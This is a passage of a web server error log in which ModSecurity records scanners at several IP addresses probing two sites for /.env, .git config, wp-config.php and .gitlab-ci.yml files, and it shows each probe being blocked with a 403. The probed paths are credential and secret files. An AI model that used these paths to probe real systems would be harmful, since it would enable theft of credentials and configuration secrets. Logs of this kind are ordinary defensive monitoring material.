"OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aOC6d2orriO7nnIrUApS6wAAAA4"]
[Sat Oct 04 08:11:03.426440 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aOC6d2orriO7nnIrUApS6wAAAA4"]
[Sat Oct 04 08:11:03.427359 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aOC6d2orriO7nnIrUApS6wAAAA4"]
[Sat Oct 04 08:11:03.427546 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aOC6d2orriO7nnIrUApS6wAAAA4"]
[Sat Oct 04 08:11:03.687185 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aOC6d2orriO7nnIrUApS7AAAAA4"]
[Sat Oct 04 08:11:03.688174 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aOC6d2orriO7nnIrUApS7AAAAA4"]
[Sat Oct 04 08:11:03.688370 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aOC6d2orriO7nnIrUApS7AAAAA4"]
[Sat Oct 04 08:11:03.917818 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aOC6d2orriO7nnIrUApS7QAAAA4"]
[Sat Oct 04 08:11:03.918774 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aOC6d2orriO7nnIrUApS7QAAAA4"]
[Sat Oct 04 08:11:03.918975 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aOC6d2orriO7nnIrUApS7QAAAA4"]
[Sat Oct 04 08:11:04.158164 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aOC6eGorriO7nnIrUApS7gAAAA4"]
[Sat Oct 04 08:11:04.159450 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aOC6eGorriO7nnIrUApS7gAAAA4"]
[Sat Oct 04 08:11:04.159676 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aOC6eGorriO7nnIrUApS7gAAAA4"]
[Sat Oct 04 15:10:02.264199 2025] [:error] [pid 3220270] [client 45.139.104.204:57250] [client 45.139.104.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOEcqlHPDzZKdjmG4BXYeQAAAA0"]
[Sat Oct 04 15:10:02.264478 2025] [:error] [pid 3220270] [client 45.139.104.204:57250] [client 45.139.104.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOEcqlHPDzZKdjmG4BXYeQAAAA0"]
[Sat Oct 04 15:10:02.264685 2025] [:error] [pid 3220270] [client 45.139.104.204:57250] [client 45.139.104.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOEcqlHPDzZKdjmG4BXYeQAAAA0"]
[Sat Oct 04 18:54:28.951492 2025] [:error] [pid 3228313] [client 185.177.72.30:46074] [client 185.177.72.30] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOFRRLN7BeZfSyhE8p1YfAAAAAU"]
[Sat Oct 04 18:54:28.951735 2025] [:error] [pid 3228313] [client 185.177.72.30:46074] [client 185.177.72.30] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOFRRLN7BeZfSyhE8p1YfAAAAAU"]
[Sat Oct 04 18:54:28.951891 2025] [:error] [pid 3228313] [client 185.177.72.30:46074] [client 185.177.72.30] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOFRRLN7BeZfSyhE8p1YfAAAAAU"]
[Sat Oct 04 18:54:29.331049 2025] [:error] [pid 3220267] [client 185.177.72.30:46090] [client 185.177.72.30] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOFRRZoRL4MS-ZFUonXa9QAAAAg"]
[Sat Oct 04 18:54:29.331272 2025] [:error] [pid 3220267] [client 185.177.72.30:46090] [client 185.177.72.30] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOFRRZoRL4MS-ZFUonXa9QAAAAg"]
[Sat Oct 04 18:54:29.331433 2025] [:error] [pid 3220267] [client 185.177.72.30:46090] [client 185.177.72.30] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOFRRZoRL4MS-ZFUonXa9QAAAAg"]
[Sat Oct 04 18:54:29.353248 2025] [:error] [pid 3220267] [client 185.177.72.30:46090] [client 185.177.72.30] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aOFRRZoRL4MS-ZFUonXa9gAAAAg"]
[Sat Oct 04 18:54:29.353460 2025] [:error] [pid 3220267] [client 185.177.72.30:46090] [client 185.177.72.30] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aOFRRZoRL4MS-ZFUonXa9gAAAAg"]
[Sat Oct 04 18:54:29.353628 2025] [:error] [pid 3220267] [client 185.177.72.30:46090] [client 185.177.72.30] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aOFRRZoRL4MS-ZFUonXa9gAAAAg"]
[Sat Oct 04 18:54:29.375582 2025] [:error] [pid 3220267] [client 185.177.72.30:46090] [client 185.177.72.30] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aOFRRZoRL4MS-ZFUonXa9wAAAAg"]
[Sat Oct 04 18:54:29.375767 2025] [:error] [pid 3220267] [client 185.177.72.30:46090] [client 185.177.72.30] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aOFRRZoRL4MS-ZFUonXa9wAAAAg"]
[Sat Oct 04 18:54:29.375918 2025] [:error] [pid 3220267] [client 185.177.72.30:46090] [client 185.177.72.30] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aOFRRZoRL4MS-ZFUonXa9wAAAAg"]
[Sun Oct 05 09:24:48.522712 2025] [:error] [pid 3241327] [client 93.123.109.7:60900] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOIdQBKEcNLthRIZRe3a_wAAAAE"]
[Sun Oct 05 09:24:48.523054 2025] [:error] [pid 3241327] [client 93.123.109.7:60900] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOIdQBKEcNLthRIZRe3a_wAAAAE"]
[Sun Oct 05 09:24:48.523249 2025] [:error] [pid 3241327] [client 93.123.109.7:60900] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOIdQBKEcNLthRIZRe3a_wAAAAE"]
[Sun Oct 05 11:55:32.646508 2025] [:error] [pid 3241326] [client 213.209.157.253:55406] [client 213.209.157.253] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aOJAlLGW9UE1z0a-cjOghgAAAAA"]
[Sun Oct 05 11:55:32.646941 2025] [:error] [pid 3241326] [client 213.209.157.253:55406] [client 213.209.157.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aOJAlLGW9UE1z0a-cjOghgAAAAA"]
[Sun Oct 05 11:55:32.647107 2025] [:error] [pid 3241326] [client 213.209.157.253:55406] [client 213.209.157.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aOJAlLGW9UE1z0a-cjOghgAAAAA"]
[Mon Oct 06 01:22:06.321208 2025] [:error] [pid 3264764] [client 45.148.10.246:47760] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOL9nuIVhNnL_mZ3QauN5AAAAAU"]
[Mon Oct 06 01:22:06.321574 2025] [:error] [pid 3264764] [client 45.148.10.246:47760] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOL9nuIVhNnL_mZ3QauN5AAAAAU"]
[Mon Oct 06 01:22:06.321854 2025] [:error] [pid 3264764] [client 45.148.10.246:47760] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOL9nuIVhNnL_mZ3QauN5AAAAAU"]
[Tue Oct 07 02:58:18.350487 2025] [:error] [pid 3289296] [client 213.209.157.93:48288] [client 213.209.157.93] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aORlqrAjI2U4W_Dh-uSEcQAAAAM"]
[Tue Oct 07 02:58:18.350816 2025] [:error] [pid 3289296] [client 213.209.157.93:48288] [client 213.209.157.93] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aORlqrAjI2U4W_Dh-uSEcQAAAAM"]
[Tue Oct 07 02:58:18.350980 2025] [:error] [pid 3289296] [client 213.209.157.93:48288] [client 213.209.157.93] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aORlqrAjI2U4W_Dh-uSEcQAAAAM"]
